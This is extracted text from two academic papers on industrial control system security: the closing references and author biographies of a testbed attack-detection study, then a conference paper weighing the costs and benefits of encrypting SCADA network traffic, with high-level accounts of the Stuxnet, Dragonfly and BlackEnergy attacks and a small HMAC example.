considered the full Tennessee Eastman process in their developed testbeds. Also, to the best of the authors' knowledge, none of the previous works have used the PROFINET protocol for injecting real-time cyber attacks.
Moreover, in most of the previous works the cyber attack detection algorithms are implemented off-line, after collecting the data from the testbed, whereas in this work the cyber attack detection schemes are all implemented in real time at the supervisory level of the testbed. Hence, the online performance of our proposed cyber attack detection schemes is demonstrated. Future work will involve the implementation of more complex multi-point cyber attacks on the testbed and the evaluation of the performance of cyber attack detection and mitigation schemes in real time on the testbed.

ACKNOWLEDGMENT
The statements made herein are solely the responsibility of the authors.

REFERENCES
[1] H. Holm, M. Karresand, A. Vidström, and E. Westring, "A survey of industrial control system testbeds," in Proc. Nordic Conf. Secure IT Syst., Stockholm, Sweden: Springer, 2015, pp. 11-26.
[2] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, "A testbed for analyzing security of SCADA control systems (TASSCS)," in Proc. ISGT, Jan. 2011, pp. 1-7.
[3] T. Morris, A. Srivastava, B. Reaves, W. Gao, K. Pavurapu, and R. Reddi, "A control system testbed to validate critical infrastructure protection concepts," Int. J. Crit. Infrastruct. Protection, vol. 4, no. 2, pp. 88-103, Aug. 2011.
[4] H. Gao, Y. Peng, K. Jia, Z. Dai, and T. Wang, "The design of ICS testbed based on emulation, physical, and simulation (EPS-ICS Testbed)," in Proc. 9th Int. Conf. Intell. Inf. Hiding Multimedia Signal Process., Oct. 2013, pp. 420-423.
[5] I. N. Fovino, M. Masera, L. Guidi, and G. Carpi, "An experimental platform for assessing SCADA vulnerabilities and countermeasures in power plants," in Proc. 3rd Int. Conf. Human Syst. Interact., May 2010, pp. 679-686.
[6] A. Bathelt, N. L. Ricker, and M. Jelali, "Revision of the Tennessee Eastman process model," IFAC-PapersOnLine, vol. 48, no. 8, pp. 309-314, 2015.
[7] Y. Zhao, Z. Nasrullah, and Z. Li, "PyOD: A Python toolbox for scalable outlier detection," J. Mach. Learn. Res., vol. 20, no. 96, pp. 1-7, Jan. 2019.
[8] A. Winnicki, M. Krotofil, and D. Gollmann, "Cyber-physical system discovery: Reverse engineering physical processes," in Proc. 3rd ACM Workshop Cyber-Phys. Syst. Secur., Apr. 2017, pp. 3-14.
[9] M. Krotofil, A. Cardenas, and K. Angrishi, "Timing of cyber-physical attacks on process control systems," in Proc. Int. Conf. Crit. Infrastruct. Protection, Springer, 2014, pp. 29-45.
[10] M. Krotofil, A. A. Cárdenas, B. Manning, and J. Larsen, "CPS: Driving cyber-physical systems to unsafe operating conditions by timing DoS attacks on sensor signals," in Proc. 30th Annu. Comput. Secur. Appl. Conf. (ACSAC), 2014, pp. 146-155.
[11] M. Krotofil, A. Cardenas, J. Larsen, and D. Gollmann, "Vulnerabilities of cyber-physical systems to stale data: Determining the optimal time to launch attacks," Int. J. Crit. Infrastruct. Protection, vol. 7, no. 4, pp. 213-232, 2014.
[12] Z.-S. Lin, A. A. Cárdenas, S. Amin, H.-Y. Tsai, Y.-L. Huang, and S. Sastry, "Security analysis for process control systems," in Proc. 16th ACM Conf. Comput. Commun. Secur. (CCS), 2009, pp. 1-13.
[13] A. A. Cárdenas, S. Amin, Z.-S. Lin, Y.-L. Huang, C.-Y. Huang, and S. Sastry, "Attacks against process control systems: Risk assessment, detection, and response," in Proc. 6th ACM Symp. Inf., Comput. Commun. Secur. (ASIACCS), 2011, pp. 355-366.
[14] I. Kiss, P. Haller, and A. Bereş, "Denial of service attack detection in case of Tennessee Eastman challenge process," Procedia Technol., vol.
19, pp. 835841, Dec. 2015. [15] I. Kiss, B. Genge, and P. Haller, ``A clustering-based approach to detect cyber attacks in process control systems,'' in Proc. IEEE 13th Int. Conf. Ind. Informat. (INDIN), Jul. 2015, pp. 142148. [16] P. Filonov, F. Kitashov, and A. Lavrentyev, ``RNN-based early cyber-attack detection for the tennessee eastman process,'' 2017, arXiv:1709.02232. [Online]. Available: http://arxiv.org/abs/1709.02232 [17] G. Bernieri, E. Etchev s Miciolino, F. Pascucci, and R. Setola, ``Mon- itoring system reaction in cyber-physical testbed under cyber-attacks,'' Comput. Electr. Eng., vol. 59, pp. 8698, Apr. 2017. [18] D. I. Urbina, J. A. Giraldo, A. A. Cardenas, N. O. Tippenhauer, J. Valente, M. Faisal, J. Ruths, R. Candell, and H. Sandberg, ``Limiting the impact of stealthy attacks on industrial control systems,'' in Proc. ACM SIGSAC Conf. Comput. Commun. Secur., Oct. 2016, pp. 10921105. [19] C.-T. Lin, S.-L. Wu, and M.-L. Lee, ``Cyber attack and defense on indus- try control systems,'' in Proc. IEEE Conf. Dependable Secure Comput., Aug. 2017, pp. 524526. [20] M. Teixeira, T. Salman, M. Zolanvari, R. Jain, N. Meskin, and M. Samaka, ``SCADA system testbed for cybersecurity research using machine learn- ing approach,'' Future Internet, vol. 10, no. 8, p. 76, Aug. 2018. [21] A. P. Mathur and N. O. Tippenhauer, ``SWaT: A water treatment testbed for research and training on ICS security,'' in Proc. Int. Workshop Cyber-Phys. Syst. Smart Water Netw. (CySWater), Apr. 2016, pp. 3136. [22] S. Adepu and A. Mathur, ``Distributed attack detection in a water treatment plant: Method and case study,'' IEEE Trans. Dependable Secure Comput., vol. 18, no. 1, pp. 8699, Jan. 2021. [23] J. Goh, S. Adepu, K. N. Junejo, and A. Mathur, ``A dataset to sup- port research in the design of secure water treatment systems,'' in Critical Information Infrastructures Security, G. Havarneanu, R. Setola, H. Nassopoulos, and S. Wolthusen, Eds. Cham, Switzerland: Springer, 2017, pp. 8899. [24] C. M. Ahmed, V. R. Palleti, and A. P. Mathur, ``Wadi: A water distribution testbed for research in the design of secure cyber physical systems,'' inProc. 3rd Int. Workshop Cyber-Phys. Syst. Smart Water Netw., 2017, pp. 2528. [25] V. K. Mishra, V. R. Palleti, and A. Mathur, ``A modeling framework for critical infrastructure and its application in detecting cyber-attacks on a water distribution system,'' Int. J. Crit. Infrastruct. Protection, vol. 26, Sep. 2019, Art. no. 100298. [26] V. S. Koganti, M. Ashrafuzzaman, A. A. Jillepalli, and F. T. Sheldon, ``A virtual testbed for security management of industrial control sys- tems,'' in Proc. 12th Int. Conf. Malicious Unwanted Softw. (MALWARE), Oct. 2017, pp. 8590. 16252 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed [27] F. Zhang, H. A. D. E. Kodituwakku, J. W. Hines, and J. Coble, ``Multilayer data-driven cyber-attack detection system for industrial control systems based on network, system, and process data,'' IEEE Trans. Ind. Informat., vol. 15, no. 7, pp. 43624369, Jul. 2019. [28] R. Negi, P. Kumar, S. Ghosh, S. K. Shukla, and A. Gahlot, ``Vulnerability assessment and mitigation for industrial critical infrastructures with cyber physical test bed,'' in Proc. IEEE Int. Conf. Ind. Cyber Phys. Syst. (ICPS), May 2019, pp. 145152. [29] X. Li, C. Zhou, Y.-C. Tian, N. Xiong, and Y. Qin, ``Asset-based dynamic impact assessment of cyberattacks for risk analysis in industrial con- trol systems,'' IEEE Trans. Ind. 
Informat., vol. 14, no. 2, pp. 608618, Feb. 2018. [30] X. Li, C. Zhou, Y.-C. Tian, and Y. Qin, ``A dynamic decision-making approach for intrusion response in industrial control systems,'' IEEE Trans. Ind. Informat., vol. 15, no. 5, pp. 25442554, May 2019. [31] J. J. Downs and E. F. Vogel, ``A plant-wide industrial process control problem,'' Comput. Chem. Eng., vol. 17, no. 3, pp. 245255, Mar. 1993. [32] N. L. Ricker and J. H. Lee, ``Nonlinear modeling and state estimation for the tennessee eastman challenge process,'' Comput. Chem. Eng., vol. 19, no. 9, pp. 9831005, Sep. 1995. [33] G. Ravi Sriniwas and Y. Arkun, ``Control of the tennessee eastman process using input-output models,'' J. Process Control, vol. 7, no. 5, pp. 387400, Oct. 1997. [34] S. Mehner and H. K nig, ``No need to marry to change your name! Attacking pro net io automation networks using DCP,'' in Proc. Int. Conf. Detection Intrusions, 2019, pp. 396414. [35] J. Akerberg and M. Bjorkman, ``Exploring security in PROFINET IO,'' in Proc. 33rd Annu. IEEE Int. Comput. Softw. Appl. Conf., 2009, pp. 406412. [36] PROFIBUS & PROFINET International (PI), Karlsruhe, Germany. PROFINET Security Guideline. Accessed: Feb. 14, 2020. [Online]. Avail- able: https://www.pro bus.com/download/pro net-security-guideline [37] M.-L. Shyu, S.-C. Chen, K. Sarinnapakorn, and L. Chang, ``A novel anomaly detection scheme based on principal component classi er,'' Naval Res. Lab., Center High Assurance Comput. Syst., Washington, DC, USA, Tech. Rep. OMB No. 0704-0188, 2003. [38] B. Sch lkopf, J. C. Platt, J. Shawe-Taylor, A. J. Smola, and R. C. Williamson, ``Estimating the support of a high-dimensional distribution,'' Neural Comput., vol. 13, no. 7, pp. 14431471, Jul. 2001. [39] M. Goldstein and S. Uchida, ``A comparative evaluation of unsupervised anomaly detection algorithms for multivariate data,'' PLoS ONE, vol. 11, no. 4, pp. 131, 2016. [40] F. Angiulli and C. Pizzuti, ``Fast outlier detection in high dimensional spaces,'' in Proc. Eur. Conf. Princ. Data Mining Knowl. Discovery. Helsinki, Finland: Springer, 2002, pp. 1527. [41] M. M. Breunig, H.-P. Kriegel, R. T. Ng, and J. Sander, ``LOF: Identifying density-based local outliers,'' SIGMOD Rec., vol. 29, no. 2, pp. 93104, May 2000, [42] F. T. Liu, K. M. Ting, and Z.-H. Zhou, ``Isolation forest,'' in Proc. 8th IEEE Int. Conf. Data Mining, Dec. 2008, pp. 413422. [43] F. T. Liu, K. M. Ting, and Z. Zhou, ``Isolation-based anomaly detection,'' ACM Trans. Knowl. Discovery Data, vol. 6, no. 1, pp. 139, Mar. 2012. [44] M. Elnour, N. Meskin, K. Khan, and R. Jain, ``A dual-isolation-forests- based attack detection framework for industrial control systems,'' IEEE Access, vol. 8, pp. 3663936651, 2020. [45] F. Pedregosa, G. Varoquaux, and A. Gramfort, ``Scikit-learn: Machine learning in Python,'' J. Mach. Learn. Res., vol. 12, pp. 28252830, Oct. 2011. [46] K. M. Ting, ``Confusion matrix,'' in Encyclopedia Machine Learning, C. Sammut and G. I. Webb, Eds. Boston, MA: Springer, 2010, p. 209. MOHAMMAD NOORIZADEH received the B.Sc. degree from Qatar University, Doha, Qatar, in 2015. He has been a Research Assistant with Qatar University since 2015. His research interests include machine learning, automation, control, and robotics. MOHAMMAD SHAKERPOUR was born in Isfa- han, Iran, in 1999. He is currently pursuing the bachelor's degree in computer engineering with Qatar University. He has been working as an Undergraduate Research Assistant with the KINDI Center for Computing Research, Qatar University, since 2018. 
NADER MESKIN (Senior Member, IEEE) received the B.Sc. degree from the Sharif Uni- versity of Technology, Tehran, Iran, in 1998, the M.Sc. degree from the University of Tehran, Tehran, in 2001, and the Ph.D. degree in electrical and computer engineering from Concordia Uni- versity, Montreal, QC, Canada, in 2008. He was a Postdoctoral Fellow at Texas A&M University at Qatar, Doha, Qatar, from January 2010 to Decem- ber 2010. He is currently an Associate Professor with Qatar University, and an Adjunct Associate Professor with Concordia University. He has published more than 220 refereed journal and conference papers. His research interests include FDI, multiagent systems, active control for clinical pharmacology, cyber-security of industrial control systems, and linear parameter varying systems. DEVRIM UNAL (Senior Member, IEEE) received the M.Sc. degree in telematics from Shef eld Uni- versity, U.K., and the Ph.D. degree in computer engineering from Bogazici University, Turkey, in 1998 and 2011, respectively. He is currently a Research Assistant Professor of Cyber Security with the KINDI Center for Computing Research, College of Engineering, Qatar University. His research interests include cyber-physical sys- tems and IoT security, wireless security, arti cial intelligence, and next generation networks. KHASHAYAR KHORASANI (Member, IEEE) received the B.S., M.S., and Ph.D. degrees in elec- trical and computer engineering from the Univer- sity of Illinois at Urbana-Champaign, in 1981, 1982, and 1985, respectively. From 1985 to 1988, he was an Assistant Professor with the University of Michigan at Dearborn, and he has been with Concordia University, Montreal, Canada, since 1988, where he is currently a Professor and a Concordia University Tier I Research Chair with the Department of Electrical and Computer Engineering and the Concordia Institute for Aerospace Design and Innovation (CIADI). His main areas of research interests include nonlinear and adaptive control, cyber-physical systems and cybersecurity, intelligent and autonomous control of networked unmanned systems, fault diagnosis, isolation and recovery (FDIR), diag- nosis, prognosis, and health management (DPHM), satellites, unmanned vehicles, and neural networks/machine learning. He has authored/coauthored over 450 publications in these areas. He has served as an Associate Editor for the IEEE TRANSACTIONS ON AEROSPACE AND ELECTRONIC SYSTEMS. VOLUME 9, 2021 16253
Encryption_in_ICS_networks_A_blessing_or_a_curse.pdf
Nowadays, the internal network communication of Industrial Control Systems (ICS) usually takes place in unencrypted form. This, however, seems bound to change in the future: as we write, encryption of network traffic is seriously being considered as a standard for future ICS. In this paper we take a critical look at the pros and cons of traffic encryption in ICS. We come to the conclusion that encrypting this kind of network traffic may actually result in a reduction of security and overall safety. As such, sensible versus non-sensible use of encryption needs to be carefully considered both in developing ICS standards and in deploying ICS.

I. INTRODUCTION
SCADA (Supervisory Control and Data Acquisition) systems and DCS (Distributed Control Systems) form an important subset of ICS (Industrial Control Systems), overseeing complex physical processes in industrial and critical infrastructures which usually span a large geographic area (e.g. a pipeline, an electrical grid). Over the last decades, ICS have evolved from largely isolated systems to largely interconnected ones, boosting efficiency but opening up the possibility of cyberattacks; indeed, in the last decade, we have witnessed a number of attacks on ICS [5], [25], [10], [7], [23], [4], [12], [30], [31], [15], [2].

The response from the ICS community has been to increase the attention to the security mechanisms already in place, and to look for new ways to defend against malicious entities. One of the proposed mechanisms to secure ICS is to encrypt communications transmitted over SCADA networks. A few proposals are on the table and, at the time of writing this article, there is a committee discussing a possible standardization of the use of encryption on ICS networks.

It is well known that security always comes at a cost, which is not only monetary, but also in terms of, e.g., usability of the system [27]. It is therefore important to evaluate whether a solution is actually worth its costs. To make such an evaluation one has to take into due consideration the attacker model at hand, the possible attacker model in the future, and the business model of the stakeholders in the ICS.

This paper aims at contributing to the discussion on the pros and cons of network encryption for ICS by providing a basis for analysing the costs and the benefits of such a solution. We determine key threats by considering recently reported ICS attacks. As the business model of the specific target ICS will also influence the discussion, the reasoning and the conclusions of this work have to be instantiated intelligently for the various application fields. Yet there are some generally applicable conclusions that we believe apply to ICS architectures in general.

The first conclusion is that, in most cases, introducing encryption (in the ICS internal network) does not yield extra security. None of the attacks we considered would have been blocked or made more difficult by the addition of encryption. Encryption aims at mitigating confidentiality leaks "on the wire", while the witnessed attacks target endpoints. Also, in many of the attacks, confidentiality is not the security goal being breached. We know of no record of an attack "on the wire" occurring in practice, while many damaging hypothetical attacks may be mitigated by authentication checks rather than encryption.

The second conclusion is that encryption can actually have negative consequences for security.
For instance, manyattacks can be detected with state-of-the-art Network Intru-sion Detection Systems (NIDS), provided that the NIDS hasaccess to the communication contents. Of course, one canimplement encryption with appropriate taps for intrusion detection, but this adds to the cost of the solution. The third and last conclusion is that encryption can considerably raise the costs of troubleshooting and recovery.For instance, problems (e.g., communication troubles, re-transmissions, failing devices, etc.) can be identi ed (much)more quickly and easily in an unencrypted network than in an encrypted one. We do not advocate completely ruling out encryption of ICS network traf c: in some cases it makes a lot of sense (forinstance, long-haul connections over untrusted networks, and in systems operating in an adversarial environment). Instead, we advocate healthy reasoning on what encryptionis actually good for, and what are its costs, particularly interms of the loss of safety and security it may actuallyintroduce . Note also that in most situations in the ICS world, one only needs to achieve authentication and integrityof the communication, and this can be done without full- edge encryption (the latter being needed only to guarantee con dentiality.) In the remainder of this paper, we rst establish the setting in Sections II-IV by providing a general descriptionof SCADA systems, their key security requirements relatedto encryption and the main cryptographic protocols beingconsidered for use as standards for SCADA systems. Next,we determine key threats by looking at recent attacks onSCADA systems in Section V. We then support each of thethree conclusions above in Sections VI-VIII before providing 1IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 978-1-5386-4055-5/17/$31.00 2017 IEEE 289Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. conclusions in Section IX. II. SCADA SYSTEMS OVERVIEW In this section we introduce the basics, the architecture and the communication strategies of SCADA systems as a basis for the security discussion in the following sections.Both ICS and SCADA systems monitor and control physicalprocesses. A key feature of SCADA systems is that they op-erate over multiple geographical locations and, as such, their communication networks need to span over large distances. Engineering Station HMI Station Corporate Network Firewalled gateway/router Interoperability Server Database Server Application Server RTU/ PLC Control Center Relay           RTU/ PLC Pressure sensor Level alarm Valve Ammeter Remote Station 1 Remote Station 2 Fig. 1. Simpli ed architecture of a SCADA system1 Figure 1 presents a simpli ed model of an industrial con- trol system connected through a SCADA network which issuf cient for our purposes. Several geographically distributed remote stations are interconnected with a control center. This could be through a dedicated link or via the Internet. Each of the stations deals with a different part of a physical process, gathering data through sensors (e.g. thepressure sensor in Remote Station 2), and/or controllingthe process through actuators (e.g. the valve at the samestation). These end devices are monitored and controlledover a local network by Programmable Logic Controllers(PLC) and Remote Terminal Units (RTU). 
These are inturn interconnected to each other, possibly in hierarchicalmaster/slave architectures or across remote stations, in orderto coordinate the monitoring of the process. Often industrial systems also have a dedicated control center (CC) to govern the entire process. A typical CCconsist of different components, such as SCADA applicationservers to monitor and control the process, Human-MachineInterfaces (HMI) for operators to interact with the SCADAsoftware, database servers with historical records, or interop-erability servers (using standards such as IEC 61850 or OPC-UA, de ned in IEC 62541 [6]) for interconnecting SCADAsoftware and hardware devices from different vendors. TheCC is usually physically separated from other parts of thesystem, and relies on a gateway/router to communicate withthe remote stations. Originally, the connection between the CC and the remote stations was done through narrowband radio, dedicated wiredlinks or even satellite systems. The need for integration ofservices (i.e. rmware update, remote access) has removedthe tight separation between SCADA and business networks; 1Icons source: www.vrt.com.au/downloads/vrt-network-equipmentand to standardize communications over all these differentphysical media, SCADA networks are moving to using IP-based networking [20]. For backwards compatibility, mes-sages are repackaged into a TCP/IP wrapper allowing reuseof message formats and existings protocols, such as Modbus.A router/gateway at each remote station serves as interfacebetween IP-based networks on the outside and the eldbus protocol-based SCADA networks on the facility oor. The communication between the control center and de- vices within remote stations can be categorized into fourtypes [33], namely: data acquisition requests, rmware up-load, control functions and broadcast messages. These dif- ferent types of messaging are usually implemented through arequest/response model with clear text messages, following a device vendor proprietary communication protocol. With these main ICS/SCADA network components in place, we next look at the security needs of such systems. III. S ECURITY PROPERTIES AND ENCRYPTION Encryption is often seen as a method to improve the security of a system. However, to really evaluate the securityof a system we rst need to know its security requirements. Capturing security requirements (for ICS). The security requirements for an ICS can be expressed using the classic C.I.A. triad of con dentiality, integrity, and availability,along with authenticity. These are useful to capture thesecurity requirements for any information system. However,priorities of different security requirements in an ICS areinherently distinct from those of a typical IT environment. In ICS, timely process execution availability is the abso- lute priority, especially for critical infrastructure or a coreprocess of the production line [36]. Process availability isachieved through the sub-requirements of network availabil-ity and data correctness, which are also essential to ensurecontinuous monitoring of faults, anomalies, and potentialthreats [11]. Correctness of data sent over an untrustednetwork requires message authenticity , which is a combi- nation of source authentication , i.e. establishing the identity or role of the sender of a message, and message integrity , i.e. assuring data has not been altered during transmission.If the data is valuable, private, or otherwise con dential, wealso need message con dentiality . 
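To make the distinction concrete: message authenticity and integrity can be obtained with a message authentication code alone, without enciphering the payload. The sketch below uses Python's standard hmac module on a hypothetical Modbus/TCP-style payload; the key handling and the choice of MAC are illustrative assumptions, not a recommendation taken from this paper.

```python
import hmac, hashlib, os

key = os.urandom(32)                      # shared secret; key distribution is not covered here
payload = bytes.fromhex("000100000006110300 6B0003".replace(" ", ""))   # example Modbus/TCP read request

# Sender: append a MAC; the payload itself stays readable (integrity + authenticity only).
tag = hmac.new(key, payload, hashlib.sha256).digest()
frame = payload + tag

# Receiver (or an inline monitor that holds the key): verify without any decryption step.
recv_payload, recv_tag = frame[:-32], frame[-32:]
ok = hmac.compare_digest(recv_tag, hmac.new(key, recv_payload, hashlib.sha256).digest())
print(ok, recv_payload.hex())             # True, and the cleartext is still inspectable
```

This is exactly the property argued for later in the paper: a monitor or troubleshooting tool keeps full visibility of the cleartext payload, which would be lost if the payload were enciphered for confidentiality.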
Traditionally, SCADA networks were built on the as- sumption that only trusted components and entities wouldbe able to connect to them. Thus there were no con den- tiality concerns, and integrity checks against faults were suf cient to also achieve messages authenticity. However,nowadays SCADA networks are more accessible and mayutilize untrusted networks such as the internet, requiringenforcement and validation of message authenticity, and data con dentiality. Achieving security requirements. Different cryptographic techniques may satisfy the requirements mentioned above by concealing and/or validating communications. A common interpretation, which we follow in this paper, of the termencryption (of traf c) is that of obfuscating the content 2IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 290Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. of messages, i.e. enciphering messages for con dentiality. Encrypted messages can then be read only by parties in possession of the appropriate decryption key: typically, thisrestricts visibility to just the endpoints of the connection. Cryptographic techniques can be used to authenticate a party and its messages, for example through the use of publickey cryptography with keys validated by digital certi catesissued by trusted third parties. We will refer to any cryp-tographic technique and key/certi cate management strategyto achieve authenticity as an authentication scheme. Note that, depending on the cipher and the way it is applied, encryption (i.e. enciphering for con dentiality) mayalso help to check the integrity and establish the authenticityof messages; encryption and authentication may be achievedby the same cryptographic operation. However, as we aretrying to clarify the reasons for using speci c techniques,we will still address them as separate requirements. IV . E NCRYPTION PROTOCOLS FOR SCADA ICS standards suggest several protocols to achieve en- cryption. For example IEC 62351 [8], for power systemsinfrastructure, recommends end-to-end protocol TLS andpoint-to-point protocol IPsec; while OPC-UA, for indus- trial automation systems, refers to end-to-end protocol WS-Security. Here we discuss the protocols recommended by IEC 62351 and use them as examples during the discussion.However, the conclusions that we draw in this paper arenot restricted to just these two schemes or the eld of power systems: since we discuss in terms of general securityproperties, the main reasoning remains applicable to the whole eld of securing SCADA networks. According to IEC 62351, Transport Layer Security (TLS) is to be added to the most common TCP/IP industrialprotocols such as MMS, DNP3, and IEC 60870-5-104;moreover, the standard discusses the applicability of well-proven standards from the IT domain, such as IPsec. TLS. TLS creates sessions that provide entity authentication, payload secrecy and message integrity. It accomplishes thisby setting up secure sessions using asymmetric public/privatekeys and digital certi cates issued by trusted third-party entities known as Certi cate Authorities (CA). A MessageAuthentication Code (MAC) is appended to each message ina TLS connection to validate a packet s integrity and avoid replay attacks. The MAC is generated from the message s data payload and a shared secret key. 
Setting up a sessionconsists of two round trips: the rst authenticates the serverto the client, who validates the server s digital certi catesignature against a list of trusted CA in the client s posses-sion. Client authentication is usually left to the applicationlayer, see e.g. IEC 62351 and OPC-UA. The second roundtrip completes the handshake by negotiating which crypto-graphic protocol to use, along with a corresponding uniquesymmetric session key. This key is used to encrypt thecontent of the messages exchanged during the session: sinceTLS works at the transport layer, it does not encrypt therouting information on the lower network layer. An externalobserver that intercepts a TLS secured datagram is limited inthe amount of information that he can extract from it: only the endpoints of the communications, along with the type ofencryption and approximate size of the data are revealed. IPsec. The IPsec protocol [19] concerns the network layer and can be implemented in legacy networks as a bump-in-the-wire, i.e. without altering the endpoints. An IPsec connection is initiated in two phases, according to the Internet Key Exchange (IKE) protocol: Phase 1 has the purpose of generating the shared secret keying material toestablish a secure authenticated channel between two peers.Using this channel, Phase 2 negotiates the IPsec securitypolicies to be applied to the data ow, and encrypts the data ow using the keys from Phase 1. After the connection isover, those keys are discarded. To authenticate peers, IPsecuses pre-shared keys, or digital certi cate signed by a CA. IPsec provides two extension protocols: Authentica- tion Header (AH)[17] and Encapsulating Security Payload(ESP)[18]. AH offers data integrity and source authenticationfor both IP header and payload. As the packet s content isnot encrypted, it can still be inspected by a rewall or anIDS. ESP offers data integrity, source authentication, andencryption, and is therefore more widely used in practice;note, however, that the ESP protocol is only applied to thepayload and not to the IP header. IPsec is used in one of twomodes: tunnel or transport, of which tunnel mode is recom-mended for establishing secure site-to-site communicationsfrom an untrusted network to the control network in SCADAsystems [29], [34]. In either mode, the payload is encrypted(using ESP) or authenticated (using AH). In tunnel modeheaders are also protected, as the source endpoint encrypts(or authenticates) the entire packet and then encapsulatesit in another IP packet. The receiving gateway will thenperform the unpacking, decryption (or authentication check)and internal routing necessary to transmit the packet to the nal destination device on the trusted network. Tunnel modecan be gateway-to-gateway or host-to-gateway; in either case,the authentication and con dentiality provided by IPsec stopat the receiving gateway and are not fully end-to-end. V. A TTACKS ON SCADA SYSTEMS When checking whether a given approach indeed achieves a security goal, one needs to consider the type of attacksagainst which they are supposed to defend. To create a broadand representative overview on the current threats to SCADAsystems, we have listed (see the rst column of Table I) con rmed attacks on SCADA systems from the RISI incident database [1] and recent V erizon data breach digests [30],[31]. Note that we restrict our attention to real attacks:e.g. 
[36] gives a list of vulnerabilities and potential misuses,some preventable by encryption, but they do not match whatis seen in practice. We describe three successful attacks in more detail, namely: Stuxnet, causing physical damage to equipment; Dragon y, stealing intellectual property data; BlackEnergy, disrupting a wide public infrastructure. 3IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 291Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. Stuxnet. The Stuxnet malware attack was conducted in 2010, targeting Iranian nuclear enrichment facilities [23]. Stuxnet operated in three stages [14]. In the rst stage, the initial infection was likely con- ducted via an infected USB ash drive from a compromised equipment vendor. Secondly, it spread locally through theSCADA network in three ways: using the normal LAN, viaremovable drives, and by infecting les used by SiemensPLCs. The objective of this phase was to look for computerspossessing the Siemens WinCC SCADA software, typically used to program PLCs, and to establish a foothold onthose machines. The third and nal stage probed for PLCs connected to the WinCC system: once found, malicious codewas injected to stealthily control speci c centrifuges, makingthem operate at unsafe speeds and resulting in a higherbreakdown rate [24]. Dragon y. The Energetic Bear/Dragon y campaign of 2011 focused on industrial espionage and intellectual propertytheft rather than taking control of the industrial process. Itspeci cally targeted industrial gateways and routers used inaviation, energy generation and distribution, pharmaceutical,food and beverage industries [21]. The infection happened in three phases [26], [4]: ini- tially, the attackers delivered malware through spear-phishing emails; then, they performed a watering hole attack byredirecting traf c from legitimate websites; and nally, theyinfected third-party applications that ICS device vendorsmade available online, thus compromising the supply chain.The malware then communicated to a command and control (C&C) server via HTTP , downloaded additional modules es-tablishing persistence, and scanned the local drives collecting information about the network layout, as well as ICS andVPN con guration les, and authentication credentials. Itdid not spread over the local network. Its nal stage wasto use an industrial protocol scanner to search the local network for any OPC services (see Fig. 1), or for devices and applications that were listening on TCP ports of commonSCADA protocols. A compromised OPC could have grantedan attacker full control over the SCADA system, but theattackers made no attempt to control the ICS devices: instead, the gathered data about the SCADA network layout was sent back to the C&C server. BlackEnergy. In late 2015, three Ukrainian power distribution utilities suffered a coordinated attack that caused a blackoutfor several hours [32]. The attack was conducted in two main stages, separated by months [12]: rst, the attackers used phishing emailsto penetrate the utilities IT networks and plant the Black-Energy 3 malware. The malware connected to its C&Cserver, moved horizontally and harvested credentials to gainVPN tunnelling access to the SCADA network; once there,it completed the initial reconnaissance by discovering theserial-to-ethernet eld devices used by the remote stationsto decode commands from the command center. 
Six months later, the attackers used the malware to take control of the SCADA workstations and HMI, locking out operators and manually issuing commands to open the remote stations' breakers, thus causing the blackout. At the same time, they deployed malicious custom firmware on the gateway devices, disabling them and preventing recovery.

VI. WHERE ENCRYPTION FAILS
With basic definitions and a description of key attacks in place, we can now evaluate our first thesis: encryption often does not yield extra SCADA security. To this end we consider the impact of encryption on the attacks described above.

Stuxnet. Recall that Stuxnet comprises three stages. The first stage, i.e. the initial infection through a compromised USB drive, did not involve network communication. In the second and third stages, Stuxnet first spread on the LAN and then infected WinCC database servers; the infected WinCC systems then uploaded control code to the PLCs, as they were authorized to do. However, this code had malicious content. In both stages, all communications were between valid parties that trusted each other. The endpoint vulnerabilities exploited in the second stage to spread Stuxnet, and the malicious content transmitted to the PLCs during the third stage, did not affect the proper establishment of the connections. As such, encryption would not have impeded the attack at all.

Dragonfly. The Dragonfly campaign used standard business-level malware techniques, focused on the target's corporate network [21]. Once there, the malware gathered locally stored authentication credentials that enabled authorized access to other remote industrial systems. In around 5% of the infections, the malware included a module to capture credentials sent over unencrypted HTTP traffic from a browser [4], [3]. Also, the attackers tried to discover and probe OPC services on LAN hosts, using the valid interfaces that were already present on the infected machines. The situation was the same as with Stuxnet, in that the attackers exploited vulnerabilities on the endpoints, while all the communications on the network were between valid parties. Only in some rare cases would encryption have hindered a small portion of the information gathering performed by the malware.

BlackEnergy. The attackers infiltrated a business workstation through email, spread their malware on the LAN, and then harvested credentials to gain legitimate and authorized access to the SCADA network, bypassing the security at the gateways of the remote stations. Using existing remote administration tools, the attackers used native connections and commands [12] to discover the ICS devices on the remote stations' local networks, to upload the custom malicious firmware to the gateways, and to control the breakers through a panel. All these malicious actions compromised endpoints rather than connections, and therefore would not have been impacted by encrypting SCADA traffic.

As stated before, encrypting a communication channel protects the confidentiality of a message during its transmission. This is relevant where potential attackers reside along the transmission path of the message, either intercepting it as a man-in-the-middle or just passively listening to it. On the other hand, if the attackers compromise a communication endpoint, as happened in our examples, it is easy to obtain the keys and configuration files needed to establish valid connections to other devices in the SCADA network, and to pivot the attack to those.

TABLE I. ANALYSIS OF RECENT SCADA INCIDENTS
Brief Description | Encr. | Net Mon. | Year | Industry
Stuxnet Malware Targets Uranium Enrichment Facility [1], [14] | X | O f,c [24] | 2010 | Power/utility
Russian-Based Dragonfly Group Attacks Energy Industry [1], [4] | X | O f,c [22] | 2014 | Power/utility
Cyber-Attack Against Ukrainian Critical Infrastructure [1], [12] | X | O f,c [32] | 2016 | Power/utility
Malware on manufacturing OT network [31] | x | O f,c [31] | 2017 | Manufacturing
Hacktivists control PLCs of Kemuri Water Company [30] | x | o c | 2016 | Water treatment
Public utility compromised after brute-force hack attack [1] | x | o f,c | 2014 | Power/utility
U.S. Power Plant Infected With Malware from USB [1] | x | ? | 2012 | Power/utility
U.S. Electric Utility Mariposa Virus Infection [1], [16] | x | O f,c [16] | 2012 | Power/utility
